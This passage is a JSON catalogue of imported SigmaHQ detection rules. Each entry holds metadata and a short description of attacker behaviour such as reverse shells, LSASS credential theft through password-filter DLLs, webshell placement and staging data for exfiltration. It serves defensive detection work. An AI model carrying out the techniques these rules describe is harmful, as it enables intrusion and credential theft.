indicators of Microsoft Connection Manager Profile Installer execution", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "endpoint", "mitre_techniques": [ "T1218.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": true, "path": "detections/sigma-imports/endpoint/cmstp-execution-registry-event.yaml", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6d235fc-1d38-4b12-adbe-325f06728f37", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" } }, { "id": "sigmahq-sigma-b6d98a4f-cef0-4abf-bbf6-24132854a83d", "type": "detection", "name": "Remote Access Tool - GoToAssist Execution", "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. 
(Citation: Symantec Living off the Land)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1219.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-access-tool-gotoassist-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_remote_access_tools_gotoopener.yml" } }, { "id": "sigmahq-sigma-b6e04788-29e1-4557-bb14-77f761848ab8", "type": "detection", "name": "Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE", "description": "Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potentially-suspicious-file-download-from-file-sharing-domain-via-powershell-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6e04788-29e1-4557-bb14-77f761848ab8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/windows/process_creation/proc_creation_win_powershell_download_susp_file_sharing_domains.yml" } }, { "id": "sigmahq-sigma-b6e2a2e3-2d30-43b1-a4ea-071e36595690", "type": "detection", "name": "Space After Filename - macOS", "description": "Detects attempts to masquerade as legitimate files by adding a space to the end of the filename.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1036.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/space-after-filename-macos.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6e2a2e3-2d30-43b1-a4ea-071e36595690", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_space_after_filename.yml" } }, { "id": "sigmahq-sigma-b6ea3cc7-542f-43ef-bbe4-980fbed444c7", "type": "detection", "name": "Remote Server Service Abuse", "description": "Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-server-service-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6ea3cc7-542f-43ef-bbe4-980fbed444c7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml" } }, { "id": "sigmahq-sigma-b6f91281-20aa-446a-b986-38a92813a18f", "type": "detection", "name": "DLL Search Order Hijackig Via Additional Space in Path", "description": "Detects when an attacker creates a folder structure similar to Windows system folders (such as Windows, Program Files...)\nbut with a space, in order to trick the DLL load search order and perform a \"DLL Search Order Hijacking\" attack", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dll-search-order-hijackig-via-additional-space-in-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b6f91281-20aa-446a-b986-38a92813a18f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_dll_sideloading_space_path.yml" } }, { "id": "sigmahq-sigma-b7216a7d-687e-4c8d-82b1-3080b2ad961f", "type": "detection", "name": "Modify Group Policy Settings - ScriptBlockLogging", "description": "Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": 
"detections/sigma-imports/_quarantine/modify-group-policy-settings-scriptblocklogging.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_modify_group_policy_settings.yml" } }, { "id": "sigmahq-sigma-b730a276-6b63-41b8-bcf8-55930c8fc6ee", "type": "detection", "name": "Csc.EXE Execution Form Potentially Suspicious Parent", "description": "Detects a potentially suspicious parent of \"csc.exe\", which could be a sign of payload delivery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1059.007", "T1218.005", "T1027.004" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/csc-exe-execution-form-potentially-suspicious-parent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_csc_susp_parent.yml" } }, { "id": "sigmahq-sigma-b743623c-2776-40e0-87b1-682b975d0ca5", "type": "detection", "name": "User Added To Admin Group Via Dscl", "description": "Detects attempts to create and add an account to the admin group via \"dscl\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": 
"medium", "category": "_quarantine", "mitre_techniques": [ "T1078.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/user-added-to-admin-group-via-dscl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b743623c-2776-40e0-87b1-682b975d0ca5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/macos/process_creation/proc_creation_macos_dscl_add_user_to_admin_group.yml" } }, { "id": "sigmahq-sigma-b7916c2a-fa2f-4795-9477-32b731f70f11", "type": "detection", "name": "Registry Persistence via Explorer Run Key", "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/registry-persistence-via-explorer-run-key.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_reg_persist_explorer_run.yml" } }, { "id": "sigmahq-sigma-b7966f4a-b333-455b-8370-8ca53c229762", "type": "detection", "name": "Dropping Of Password Filter DLL", "description": "Detects dropping of dll 
files in system32 that may be used to retrieve user credentials from LSASS", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dropping-of-password-filter-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7966f4a-b333-455b-8370-8ca53c229762", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_credential_access_via_password_filter.yml" } }, { "id": "sigmahq-sigma-b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "type": "detection", "name": "Zip A Folder With PowerShell For Staging In Temp - PowerShell Script", "description": "Detects PowerShell scripts that make use of the \"Compress-Archive\" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration.\nAn adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1074.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/zip-a-folder-with-powershell-for-staging-in-temp-powershell-script.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC 
engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7a3c9a3-09ea-4934-8864-6a32cacd98d9", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_susp_zip_compress.yml" } }, { "id": "sigmahq-sigma-b7b19cb6-9b32-4fc4-a108-73f19acfe262", "type": "detection", "name": "Suspicious VBoxDrvInst.exe Parameters", "description": "Detects VBoxDrvInst.exe run with parameters that allow processing an INF file.\nThis allows creating values in the registry and installing drivers.\nFor example, one could use this technique to obtain persistence by modifying one of the Run or RunOnce registry keys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-vboxdrvinst-exe-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7b19cb6-9b32-4fc4-a108-73f19acfe262", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml" } }, { "id": "sigmahq-sigma-b7bc7038-638b-4ffd-880c-292c692209ef", "type": "detection", "name": "Certificate Request Export to Exchange Webserver", "description": "Detects a write of an Exchange CSR to an untypical directory or with aspx name suffix which can be used to place a webshell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "critical", "category": "_quarantine", 
"mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/certificate-request-export-to-exchange-webserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7bc7038-638b-4ffd-880c-292c692209ef", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_proxyshell_certificate_generation.yml" } }, { "id": "sigmahq-sigma-b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "type": "detection", "name": "Reg Add Suspicious Paths", "description": "Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1112", "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/reg-add-suspicious-paths.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7e2a8d4-74bb-4b78-adc9-3f92af2d4829", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_reg_susp_paths.yml" } }, { "id": "sigmahq-sigma-b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "type": "detection", "name": "PowerShell PSAttack", "description": "Detects the use of PSAttack PowerShell hack tool", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], 
"severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/powershell-psattack.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/powershell/powershell_script/posh_ps_psattack.yml" } }, { "id": "sigmahq-sigma-b831353c-1971-477b-abb6-2828edc3bca1", "type": "detection", "name": "Azure Keyvault Secrets Modified or Deleted", "description": "Identifies when secrets are modified or deleted in Azure.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552", "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/azure-keyvault-secrets-modified-or-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b831353c-1971-477b-abb6-2828edc3bca1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/activity_logs/azure_keyvault_secrets_modified_or_deleted.yml" } }, { "id": "sigmahq-sigma-b85e5894-9b19-4d86-8c87-a2f3b81f0521", "type": "detection", "name": "BITS Transfer Job Downloading File Potential Suspicious Extension", "description": "Detects new BITS transfer job saving local files with 
potential suspicious extensions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1197" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bits-transfer-job-downloading-file-potential-suspicious-extension.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b85e5894-9b19-4d86-8c87-a2f3b81f0521", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/bits_client/win_bits_client_new_transfer_saving_susp_extensions.yml" } }, { "id": "sigmahq-sigma-b86852fb-4c77-48f9-8519-eb1b2c308b59", "type": "detection", "name": "Potential Persistence Via AppCompat RegisterAppRestart Layer", "description": "Detects the setting of the REGISTERAPPRESTART compatibility layer on an application.\nThis compatibility layer allows an application to register for restart using the \"RegisterApplicationRestart\" API.\nThis can be potentially abused as a persistence mechanism.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1546.011" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-appcompat-registerapprestart-layer.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b86852fb-4c77-48f9-8519-eb1b2c308b59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": 
"https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml" } }, { "id": "sigmahq-sigma-b86d356d-6093-443d-971c-9b07db583c68", "type": "detection", "name": "Suspicious Curl Change User Agents - Linux", "description": "Detects a suspicious curl process start on linux with set useragent options", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-curl-change-user-agents-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b86d356d-6093-443d-971c-9b07db583c68", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_susp_curl_useragent.yml" } }, { "id": "sigmahq-sigma-b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a", "type": "detection", "name": "File Download From IP Based URL Via CertOC.EXE", "description": "Detects when a user downloads a file from an IP based URL using CertOC.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-from-ip-based-url-via-certoc-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": 
"SigmaHQ/sigma", "source_id": "b86f6dea-0b2f-41f5-bdcc-a057bd19cd6a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_certoc_download_direct_ip.yml" } }, { "id": "sigmahq-sigma-b888e3f2-224d-4435-b00b-9dd66e9ea1f1", "type": "detection", "name": "Uncommon Extension In Keyboard Layout IME File Registry Value", "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-extension-in-keyboard-layout-ime-file-registry-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b888e3f2-224d-4435-b00b-9dd66e9ea1f1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_ime_non_default_extension.yml" } }, { "id": "sigmahq-sigma-b8b1b304-a60f-4999-9a6e-c547bde03ffd", "type": "detection", "name": "DeviceCredentialDeployment 
Execution", "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/devicecredentialdeployment-execution.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_device_credential_deployment.yml" } }, { "id": "sigmahq-sigma-b8bdac18-c06e-4016-ac30-221553e74f59", "type": "detection", "name": "Potential Ruby Reverse Shell", "description": "Detects execution of ruby with the \"-e\" flag and calls to \"socket\" related functions. 
This could be an indication of a potential attempt to setup a reverse shell", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-ruby-reverse-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b8bdac18-c06e-4016-ac30-221553e74f59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_ruby_reverse_shell.yml" } }, { "id": "sigmahq-sigma-b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "type": "detection", "name": "Windows Binaries Write Suspicious Extensions", "description": "Detects Windows executables that write files with suspicious extensions", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1036" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-binaries-write-suspicious-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b8fd0e93-ff58-4cbd-8f48-1c114e342e62", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_shell_write_susp_files_extensions.yml" } }, { "id": "sigmahq-sigma-b91e8d5e-0033-44fe-973f-b730316f23a1", "type": 
"detection", "name": "Bitbucket Secret Scanning Exempt Repository Added", "description": "Detects when a repository is exempted from secret scanning feature.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/bitbucket-secret-scanning-exempt-repository-added.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b91e8d5e-0033-44fe-973f-b730316f23a1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/bitbucket/audit/bitbucket_audit_secret_scanning_exempt_repository_detected.yml" } }, { "id": "sigmahq-sigma-b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "type": "detection", "name": "HackTool - Empire UserAgent URI Combo", "description": "Detects user agent and URI paths used by empire agents", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/hacktool-empire-useragent-uri-combo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b923f7d6-ac89-4a50-a71a-89fb846b4aa8", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": 
"rules/web/proxy_generic/proxy_hktl_empire_ua_uri_patterns.yml" } }, { "id": "sigmahq-sigma-b94bf91e-c2bf-4047-9c43-c6810f43baad", "type": "detection", "name": "AWS ECS Task Definition That Queries The Credential Endpoint", "description": "Detects when an Elastic Container Service (ECS) Task Definition includes a command to query the credential endpoint.\nThis can indicate a potential adversary adding a backdoor to establish persistence or escalate privileges.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1525" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/aws-ecs-task-definition-that-queries-the-credential-endpoint.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b94bf91e-c2bf-4047-9c43-c6810f43baad", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/aws/cloudtrail/aws_ecs_task_definition_cred_endpoint_query.yml" } }, { "id": "sigmahq-sigma-b96b2031-7c17-4473-afe7-a30ce714db29", "type": "detection", "name": "Use of FSharp Interpreters", "description": "Detects the execution of FSharp Interpreters \"FsiAnyCpu.exe\" and \"FSi.exe\"\nBoth can be used for AWL bypass and to execute F# code via scripts or inline.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/use-of-fsharp-interpreters.yaml", "quarantine_reason": "imported rule; upstream 
query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b96b2031-7c17-4473-afe7-a30ce714db29", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_fsi_fsharp_code_execution.yml" } }, { "id": "sigmahq-sigma-b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "type": "detection", "name": "Indirect Command Execution By Program Compatibility Wizard", "description": "Detect indirect command execution via Program Compatibility Assistant pcwrun.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/indirect-command-execution-by-program-compatibility-wizard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "b97cd4b1-30b8-4a9d-bd72-6293928d52bc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_lolbin_pcwrun.yml" } }, { "id": "sigmahq-sigma-b98968aa-dbc0-4a9c-ac35-108363cbf8d5", "type": "detection", "name": "WINEKEY Registry Modification", "description": "Detects potential malicious modification of run keys by winekey or team9 